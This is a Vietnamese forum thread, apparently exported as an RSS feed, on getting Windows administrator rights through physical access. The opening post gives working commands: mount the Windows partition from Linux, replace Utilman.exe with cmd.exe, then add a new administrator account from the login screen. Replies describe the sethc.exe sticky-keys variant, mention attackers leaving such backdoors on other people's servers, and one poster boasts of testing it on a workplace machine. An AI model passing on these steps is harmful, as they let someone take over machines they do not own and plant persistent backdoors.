<![CDATA[Latest posts for the topic "Một cách lấy quyền admin của Windows khi có physical access"]]> /hvaonline/posts/list/23.html JForum - http://www.jforum.net Một cách lấy quyền admin của Windows khi có physical access Code:
fdisk -l
để ý dòng nào có cái NTFS (FAT32), và copy cái /dev/xxx. ví dụ Code:
/dev/sda2              13       64408   517250914    7  HPFS/NTFS
mount cái dev này vào folder chơi Code:
mkdir /mnt/sda2
mount -t ntfs /dev/sda2 /mnt/sda2/
bây giờ đến đoạn tricky, ta sử dụng con "backdoor" cho sẵn của window. http://www.file.net/process/utilman.exe.html) Code:
cd /mnt/sda2/Windows/System32/
mv Utilman.exe Utilman.exe.bak
cp cmd.exe Utilman.exe
Xong, bây giờ reboot lại vào Window, Nhấn tổ hợp [Window-Key] + U Bảng cmd.exe chạy dưới quyền SYSTEM sẽ hiện lên. Việc còn lại chỉ là tạo 1 user admin: Code:
net user foo passf00 /add
net localgroup Administrator foo /add
Sau đó tắt cmd đi vào login vào bằng foo/passf00 Chúc thành công Tested : Window 7 Nguồn: sưu tầm :D ]]>
/hvaonline/posts/list/41088.html#252988 /hvaonline/posts/list/41088.html#252988 GMT
Một cách lấy quyền admin của Windows khi có physical access /hvaonline/posts/list/41088.html#252992 /hvaonline/posts/list/41088.html#252992 GMT Một cách lấy quyền admin của Windows khi có physical access /hvaonline/posts/list/41088.html#252996 /hvaonline/posts/list/41088.html#252996 GMT Một cách lấy quyền admin của Windows khi có physical access

xnohat wrote:
Cách này giống ngày xưa mình làm trên thằng Windows XP thì đổi file sethc.exe là file của chương trình stickykey bằng file cmd.exe . Sau khi bấm 5 lần phím Shift thì cmd.exe hiện ra dù đang ở màn hình logon :-) 
bên xp thì dùng được, không biết bên win7 còn dùng được không nhỉ?]]>
/hvaonline/posts/list/41088.html#252997 /hvaonline/posts/list/41088.html#252997 GMT
Một cách lấy quyền admin của Windows khi có physical access

maitan_10000 wrote:

xnohat wrote:
Cách này giống ngày xưa mình làm trên thằng Windows XP thì đổi file sethc.exe là file của chương trình stickykey bằng file cmd.exe . Sau khi bấm 5 lần phím Shift thì cmd.exe hiện ra dù đang ở màn hình logon :-) 
bên xp thì dùng được, không biết bên win7 còn dùng được không nhỉ? 
Win7 cũng làm được đấy :D Windows/System32/sethc.exe Ngoài ra trong win7 còn có thằng displayswitch.exe :)) . Lắm "backdoor" quá ]]>
/hvaonline/posts/list/41088.html#253000 /hvaonline/posts/list/41088.html#253000 GMT
Một cách lấy quyền admin của Windows khi có physical access

WinDak wrote:

maitan_10000 wrote:

xnohat wrote:
Cách này giống ngày xưa mình làm trên thằng Windows XP thì đổi file sethc.exe là file của chương trình stickykey bằng file cmd.exe . Sau khi bấm 5 lần phím Shift thì cmd.exe hiện ra dù đang ở màn hình logon :-) 
bên xp thì dùng được, không biết bên win7 còn dùng được không nhỉ? 
Win7 cũng làm được đấy :D Windows/System32/sethc.exe Ngoài ra trong win7 còn có thằng displayswitch.exe :)) . Lắm "backdoor" quá  
Win7 không ghi đè kiểu thông thường được anh ạ. còn cách sethc.exe thì 1 số cu cậu còn làm backdoor trên cả server của người ta =)). thằng admin server cứ há mồm tìm backdoor (dùng diệt virus quét thật lực) nhưng mấy hôm sau lại thấy user administrator khác được tạo thêm. cuối cùng sau 3 ngày liền ngồi rình thì tóm được 1 cái ComputerName remote vào -> google ra tên thằng Hack =((.]]>
/hvaonline/posts/list/41088.html#253002 /hvaonline/posts/list/41088.html#253002 GMT
Một cách lấy quyền admin của Windows khi có physical access

phanledaivuong wrote:
Win7 không ghi đè kiểu thông thường được anh ạ. còn cách sethc.exe thì 1 số cu cậu còn làm backdoor trên cả server của người ta =)). thằng admin server cứ há mồm tìm backdoor (dùng diệt virus quét thật lực) nhưng mấy hôm sau lại thấy user administrator khác được tạo thêm. cuối cùng sau 3 ngày liền ngồi rình thì tóm được 1 cái ComputerName remote vào -> google ra tên thằng Hack =((. 
Đúng là trong Windows thì những file hệ thống thường có "Windows File Protection" bảo vệ nên không thể chép đè lên chúng TRONG WINDOWS dù có quyền admin đi chăng nữa. Có lẽ phải patch một số file khác để làm việc đó (như thế nào tớ cũng không rõ). Cho nên cách tớ và các anh em trên đang thảo luận chỉ làm việc khi boot vào 1 HDH khác, khi đó file system của Window không có gì bảo vệ. nói nhỏ: đã test thành công với thằng máy Windows 7 ở chỗ mình làm việc :P. Anh em nào giỏi "cracking" có khi còn có thể patch một vài file khi khởi động của Windows để cho đăng nhập với bất kì password nào chẳng hạn. ]]>
/hvaonline/posts/list/41088.html#253012 /hvaonline/posts/list/41088.html#253012 GMT
Một cách lấy quyền admin của Windows khi có physical access

WinDak wrote:

phanledaivuong wrote:
Win7 không ghi đè kiểu thông thường được anh ạ. còn cách sethc.exe thì 1 số cu cậu còn làm backdoor trên cả server của người ta =)). thằng admin server cứ há mồm tìm backdoor (dùng diệt virus quét thật lực) nhưng mấy hôm sau lại thấy user administrator khác được tạo thêm. cuối cùng sau 3 ngày liền ngồi rình thì tóm được 1 cái ComputerName remote vào -> google ra tên thằng Hack =((. 
Đúng là trong Windows thì những file hệ thống thường có "Windows File Protection" bảo vệ nên không thể chép đè lên chúng TRONG WINDOWS dù có quyền admin đi chăng nữa. Có lẽ phải patch một số file khác để làm việc đó (như thế nào tớ cũng không rõ). Cho nên cách tớ và các anh em trên đang thảo luận chỉ làm việc khi boot vào 1 HDH khác, khi đó file system của Window không có gì bảo vệ. nói nhỏ: đã test thành công với thằng máy Windows 7 ở chỗ mình làm việc :P. Anh em nào giỏi "cracking" có khi còn có thể patch một vài file khi khởi động của Windows để cho đăng nhập với bất kì password nào chẳng hạn.  
trước đây mình có thử chép đè bằng Ubuntu. tuy nhiên khi khởi động vào Windows 7 thì bị báo lỗi nên phải sửa lại như cũ. chắc là để hôm nào mình thử lại.]]>
/hvaonline/posts/list/41088.html#253016 /hvaonline/posts/list/41088.html#253016 GMT
Một cách lấy quyền admin của Windows khi có physical access /hvaonline/posts/list/41088.html#253497 /hvaonline/posts/list/41088.html#253497 GMT Một cách lấy quyền admin của Windows khi có physical access

WinDak wrote:

phanledaivuong wrote:
Win7 không ghi đè kiểu thông thường được anh ạ. còn cách sethc.exe thì 1 số cu cậu còn làm backdoor trên cả server của người ta =)). thằng admin server cứ há mồm tìm backdoor (dùng diệt virus quét thật lực) nhưng mấy hôm sau lại thấy user administrator khác được tạo thêm. cuối cùng sau 3 ngày liền ngồi rình thì tóm được 1 cái ComputerName remote vào -> google ra tên thằng Hack =((. 
Đúng là trong Windows thì những file hệ thống thường có "Windows File Protection" bảo vệ nên không thể chép đè lên chúng TRONG WINDOWS dù có quyền admin đi chăng nữa. Có lẽ phải patch một số file khác để làm việc đó (như thế nào tớ cũng không rõ). Cho nên cách tớ và các anh em trên đang thảo luận chỉ làm việc khi boot vào 1 HDH khác, khi đó file system của Window không có gì bảo vệ. nói nhỏ: đã test thành công với thằng máy Windows 7 ở chỗ mình làm việc :P. Anh em nào giỏi "cracking" có khi còn có thể patch một vài file khi khởi động của Windows để cho đăng nhập với bất kì password nào chẳng hạn.  
Cái này thì dùng tool có sẵn của Windows giải quyết :) Trong cmd gõ lệnh takeown /? để biết thêm chi tiết :D ]]>
/hvaonline/posts/list/41088.html#253589 /hvaonline/posts/list/41088.html#253589 GMT
Một cách lấy quyền admin của Windows khi có physical access /hvaonline/posts/list/41088.html#254492 /hvaonline/posts/list/41088.html#254492 GMT Một cách lấy quyền admin của Windows khi có physical access /hvaonline/posts/list/41088.html#254764 /hvaonline/posts/list/41088.html#254764 GMT Một cách lấy quyền admin của Windows khi có physical access /hvaonline/posts/list/41088.html#256719 /hvaonline/posts/list/41088.html#256719 GMT Một cách lấy quyền admin của Windows khi có physical access

.lht. wrote:

WinDak wrote:

phanledaivuong wrote:
Win7 không ghi đè kiểu thông thường được anh ạ. còn cách sethc.exe thì 1 số cu cậu còn làm backdoor trên cả server của người ta =)). thằng admin server cứ há mồm tìm backdoor (dùng diệt virus quét thật lực) nhưng mấy hôm sau lại thấy user administrator khác được tạo thêm. cuối cùng sau 3 ngày liền ngồi rình thì tóm được 1 cái ComputerName remote vào -> google ra tên thằng Hack =((. 
Đúng là trong Windows thì những file hệ thống thường có "Windows File Protection" bảo vệ nên không thể chép đè lên chúng TRONG WINDOWS dù có quyền admin đi chăng nữa. Có lẽ phải patch một số file khác để làm việc đó (như thế nào tớ cũng không rõ). Cho nên cách tớ và các anh em trên đang thảo luận chỉ làm việc khi boot vào 1 HDH khác, khi đó file system của Window không có gì bảo vệ. nói nhỏ: đã test thành công với thằng máy Windows 7 ở chỗ mình làm việc :P. Anh em nào giỏi "cracking" có khi còn có thể patch một vài file khi khởi động của Windows để cho đăng nhập với bất kì password nào chẳng hạn.  
Cái này thì dùng tool có sẵn của Windows giải quyết :) Trong cmd gõ lệnh takeown /? để biết thêm chi tiết :D  
take ownership chỉ dùng khi đã logon vào system rồi, còn chưa login thì ... botay]]>
/hvaonline/posts/list/41088.html#256790 /hvaonline/posts/list/41088.html#256790 GMT
Một cách lấy quyền admin của Windows khi có physical access

xnohat wrote:
Cách này giống ngày xưa mình làm trên thằng Windows XP thì đổi file sethc.exe là file của chương trình stickykey bằng file cmd.exe . Sau khi bấm 5 lần phím Shift thì cmd.exe hiện ra dù đang ở màn hình logon :-) 

WinDak wrote:

maitan_10000 wrote:

xnohat wrote:
Cách này giống ngày xưa mình làm trên thằng Windows XP thì đổi file sethc.exe là file của chương trình stickykey bằng file cmd.exe . Sau khi bấm 5 lần phím Shift thì cmd.exe hiện ra dù đang ở màn hình logon :-) 
bên xp thì dùng được, không biết bên win7 còn dùng được không nhỉ? 
Win7 cũng làm được đấy :D Windows/System32/sethc.exe Ngoài ra trong win7 còn có thằng displayswitch.exe :)) . Lắm "backdoor" quá  
Với Windows XP SP3 thì các cách trên không dùng được cho limited user nữa rồi :) .]]>
/hvaonline/posts/list/41088.html#262727 /hvaonline/posts/list/41088.html#262727 GMT